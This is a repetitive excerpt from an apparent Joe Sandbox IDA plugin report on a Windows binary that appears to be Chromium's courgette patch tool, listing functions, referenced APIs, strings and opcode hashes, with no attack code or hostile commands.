Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$Facet_Lockit::_Lockit::~_Register
String ID:
API String ID: 878851027-0
Opcode ID: 72c3e5a6bad2b15d9f3a7d29b59e8916e0a52e34b30924321d953e47ea83ed21
Instruction ID: 5fe818116f6bf94b874ca357bb34661cdb87f5e95b9ba85366b6cdd3e9be4ab4
Opcode Fuzzy Hash: 72c3e5a6bad2b15d9f3a7d29b59e8916e0a52e34b30924321d953e47ea83ed21
Instruction Fuzzy Hash: B83264762096C089DA72DB26A4503EEB7A1F799BD0F048111EFD947BAAEB3DC445CB00

Function 00000001400089D0 Relevance: 9.5, APIs: 6, Instructions: 500COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000140008A8B
std::_Facet_Register.LIBCPMT ref: 0000000140008AF0
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140008B15
std::_Lockit::_Lockit.LIBCPMT ref: 0000000140008BBC
std::_Facet_Register.LIBCPMT ref: 0000000140008C21
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140008C46

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$Facet_Lockit::_Lockit::~_Register
String ID:
API String ID: 878851027-0
Opcode ID: 1cc40a540fa2ab66974da79227f66b593c7412ca6c070c18acc30cff5b8970e8
Instruction ID: 095a50fb5009d2d7830533304cd5776aa013ba41174eb2c9c563c611eef03d36
Opcode Fuzzy Hash: 1cc40a540fa2ab66974da79227f66b593c7412ca6c070c18acc30cff5b8970e8
Instruction Fuzzy Hash: BA3274762096D485EA72CB26E0447EEBBA5F79DBD0F088111EFD947BA9DB38C445CB00

Function 000000014003E2C0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 374COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014003E56D

Strings

Histogram.MismatchedConstructionArguments, xrefs: 000000014003E397
Histogram.BadConstructionArguments, xrefs: 000000014003E660

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments
API String ID: 3668304517-1562091482
Opcode ID: ad0235175082f3bc0d0db5c51136459a15a3afb67d3c2f37306f024785b1f287
Instruction ID: 766f19bad60724419a2fb2a71472ad0179dc2248379e219117945b347b7de9a7
Opcode Fuzzy Hash: ad0235175082f3bc0d0db5c51136459a15a3afb67d3c2f37306f024785b1f287
Instruction Fuzzy Hash: 54E18032604A8486EB26DF2AE45439EB7A1F789BD4F444221FB9D47BE5DF38D441CB40

Function 000000014005CAB8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000014005CB31
RtlLookupFunctionEntry.KERNEL32 ref: 000000014005CB49
RtlVirtualUnwind.KERNEL32 ref: 000000014005CB84
IsDebuggerPresent.KERNEL32 ref: 000000014005CBBD
SetUnhandledExceptionFilter.KERNEL32 ref: 000000014005CBC7
UnhandledExceptionFilter.KERNEL32 ref: 000000014005CBD2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: c405f5e02203b2e82b108c199658409fdfd04a65e5a12bec2ab15aa6addfa37c
Instruction ID: 359d926316a825bfd1ac28abc367425d8a0d86e6029732cf5b4507897c3768ff
Opcode Fuzzy Hash: c405f5e02203b2e82b108c199658409fdfd04a65e5a12bec2ab15aa6addfa37c
Instruction Fuzzy Hash: 15311236214B8086E761CF26E8417DE73A4F789798F540116FB9D43BA9DF39C655CB00

Function 0000000140006D83 Relevance: 8.1, Strings: 6, Instructions: 628COMMON

Download Yara Rule

Strings

old, xrefs: 0000000140006E1C
new, xrefs: 0000000140006E5C
start GenerateEnsemblePatch, xrefs: 0000000140006DAE
Cou, xrefs: 00000001400075C3
done GenerateEnsemblePatch , xrefs: 00000001400076B0
../../courgette/ensemble_create.cc, xrefs: 0000000140006D83, 000000014000766C, 0000000140007685

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast
String ID: ../../courgette/ensemble_create.cc$Cou$done GenerateEnsemblePatch $new$old$start GenerateEnsemblePatch
API String ID: 1452528299-2337030910
Opcode ID: c09f8652eb09d79bdc346d5efcb6e1ad7fd90417456e308630382ba4f82a5572
Instruction ID: adfeb8b482ef213e175082cead9bef5afe0f9a5ade1115962aa5e879ca53c99c
Opcode Fuzzy Hash: c09f8652eb09d79bdc346d5efcb6e1ad7fd90417456e308630382ba4f82a5572
Instruction Fuzzy Hash: 77529FB2618A8481EA62DB26F5403EEA361F78DBC4F404112EF8D57BA6EF7DC546C740

Function 0000000140042360 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 381COMMON

Download Yara Rule

Strings

(flags = 0x%x), xrefs: 00000001400423DB
Histogram: %s recorded %d samples, xrefs: 00000001400423BD

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: (flags = 0x%x)$Histogram: %s recorded %d samples
API String ID: 0-1860478404
Opcode ID: 20239126da43af0211dcd29a190d0a1a48278af795605be85cf121eaddf70a83
Instruction ID: 2388121d5ebf2853687cc1da0319916b7d39d7ae8d215062666777d134ea97c6
Opcode Fuzzy Hash: 20239126da43af0211dcd29a190d0a1a48278af795605be85cf121eaddf70a83
Instruction Fuzzy Hash: 60F16B76304A4486EA11DB2AE04439EA761FB89FD4F918121EF8E07BB9DF79C485C744

Function 00000001400112A0 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 586COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140011CEF

Strings

, xrefs: 00000001400119DA
'old' input, xrefs: 00000001400112A2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $'old' input
API String ID: 3668304517-3577492294
Opcode ID: fd8bc931f930f202b15cfc174ad6d4ada362de7f8bf745fd789f5c9e5b39384e
Instruction ID: 86ab90e91ded45cc42eaea35075e88362078448e21edba77dd276898ab8da5ce
Opcode Fuzzy Hash: fd8bc931f930f202b15cfc174ad6d4ada362de7f8bf745fd789f5c9e5b39384e
Instruction Fuzzy Hash: D2426D72615AC481EE258B56E0453EEA362F7C9BE4F408311FBAD4B7E9EB79C085C740

Function 000000014006A288 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014006A2EC

Strings

gfffffff, xrefs: 000000014006A581

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: f045a6bfb0a37ec029d169638d5f60f488dd3a244e1a8564c263e3bf8381f96a
Instruction ID: 1ca8ccd5f1060eddc36cf7853e7c03a566135e05c314044d9d74f52bdd90512b
Opcode Fuzzy Hash: f045a6bfb0a37ec029d169638d5f60f488dd3a244e1a8564c263e3bf8381f96a
Instruction Fuzzy Hash: 5191A8737057C486EB13DB2A98143ED77A6E79ABC4F258422EB4D473A5DA3DC502CB01

Function 000000014006D4D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014006D50C

Part of subcall function 000000014005CA70: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,000000014005CCC9), ref: 000000014005CA79
Part of subcall function 000000014005CA70: GetCurrentProcess.KERNEL32(?,?,?,?,000000014005CCC9), ref: 000000014005CA9E

Strings

*?, xrefs: 000000014006D533
., xrefs: 000000014006D9B7

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: *?$.
API String ID: 4036615347-3972193922
Opcode ID: c22f3440a6cf443842363e160fa76a98189227662240274cb1a09e49210aef0c
Instruction ID: bbf4fa30bc1fc5104b4191395919683c04eba9c6074da9c7e0101442828b4ee9
Opcode Fuzzy Hash: c22f3440a6cf443842363e160fa76a98189227662240274cb1a09e49210aef0c
Instruction Fuzzy Hash: DA519E72B11B9885EF16DBA79C007D937A2B758BD8F644926FF5D07BA5EA38C441C300

Function 0000000140015BD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32 ref: 0000000140015C64
MapViewOfFile.KERNEL32 ref: 0000000140015D41

Strings

'old' input, xrefs: 0000000140015BD2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: File$CreateMappingView
String ID: 'old' input
API String ID: 3452162329-428240730
Opcode ID: 85ee8ae8c9cb56244d4480d6393d7909320868dafe6fd6d1bda1629a16ae082d
Instruction ID: 5f83e17c0b97b3a43f48d120084897ac5a8e3f6d357c5572b7ada1f88f69f79f
Opcode Fuzzy Hash: 85ee8ae8c9cb56244d4480d6393d7909320868dafe6fd6d1bda1629a16ae082d
Instruction Fuzzy Hash: D841AE32214B44CAFB62AF13E8457AAA7A1F788BD5F505012BF8E0F765DE3AC0428740

Function 0000000140066B24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066B5D
GetLocaleInfoW.KERNEL32(?,?,?,?,00000000,000000014005A9AE), ref: 0000000140066B8B

Strings

GetLocaleInfoEx, xrefs: 0000000140066B40, 0000000140066B51

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: 163e228bcca3462005c3c1e2e8719baf3153c4a5996c49ec70f08034ab39f249
Instruction ID: 8446781f6f561e62b72114f151621f991fd9cdeb1d1bb328d06309c4dbb75cdb
Opcode Fuzzy Hash: 163e228bcca3462005c3c1e2e8719baf3153c4a5996c49ec70f08034ab39f249
Instruction Fuzzy Hash: AE016D35704A80D2E7029B67A8407CAA761B79CBD0F689426FF4D13B79CE38CA558740

Function 0000000140063110 Relevance: 4.8, APIs: 3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebf8648d7ee3da799c4f541d254e1186d0b124807c91a44ae569beb0c557d06
Instruction ID: d7ecca3a8b6b9284a728075465f1d5275c1ddac6469beae861f3462acd9a486e
Opcode Fuzzy Hash: aebf8648d7ee3da799c4f541d254e1186d0b124807c91a44ae569beb0c557d06
Instruction Fuzzy Hash: 8CC1F77271468587DB35CF1AE48879EB7A2F3887C4F648525EB4E43B54DB38E942CB80

Function 000000014006CE50 Relevance: 4.7, APIs: 3, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

GetLocaleInfoW.KERNEL32 ref: 000000014006CEBD
GetLocaleInfoW.KERNEL32 ref: 000000014006CF0F
GetLocaleInfoW.KERNEL32 ref: 000000014006CFD6

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 9e7ea4fc7bea78da873f3b5bfe8751c7ad12c8e9f75dc2feb3eca5fa660d87d7
Instruction ID: 939e6ed799c3e59372a37fe07811a4c7a5ac22c5a5d0ad690f14afc7ee194c22
Opcode Fuzzy Hash: 9e7ea4fc7bea78da873f3b5bfe8751c7ad12c8e9f75dc2feb3eca5fa660d87d7
Instruction Fuzzy Hash: 4561B07261064186FB368F26E9807E973A2F78C7C4F608926E79E876A5DB38D591C700

Function 0000000140043240 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 653COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140043917

Strings

Windows.FilesystemError., xrefs: 0000000140043246, 0000000140043926

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Windows.FilesystemError.
API String ID: 3668304517-4117249092
Opcode ID: 70b167d98d7f6ec45771d97e994175d8e00840114735cedd6b490695be9c2ba3
Instruction ID: a635d599b9f0ee3af0686addc06bd1782171884b607c790a318f1ad103c604c7
Opcode Fuzzy Hash: 70b167d98d7f6ec45771d97e994175d8e00840114735cedd6b490695be9c2ba3
Instruction Fuzzy Hash: 174291B3B21B4482EE528B16D5443E86364F759BE0F169725EBBE137E0EB34D1A1C344

Function 0000000140070280 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00000001400704CF
RaiseException.KERNEL32 ref: 00000001400704E0

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: f5025a8400e08d63365a1345c57e323942c782f4ab00e02c3d536463c2adb7e7
Instruction ID: fa66bc85fba95ada66e1d31ff7c247c7e2002a56bf254e064ca043c21381539f
Opcode Fuzzy Hash: f5025a8400e08d63365a1345c57e323942c782f4ab00e02c3d536463c2adb7e7
Instruction Fuzzy Hash: 29B11E77601B48CBEB56CF6AC84639D77A0F348B88F158A15EB59877B4CB39D851CB00

Function 0000000140062484 Relevance: 3.2, APIs: 2, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

APIs

_Wcsftime.LIBCMT ref: 00000001400624D7

Part of subcall function 000000014005A664: _invalid_parameter_noinfo.LIBCMT ref: 000000014005A68F

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

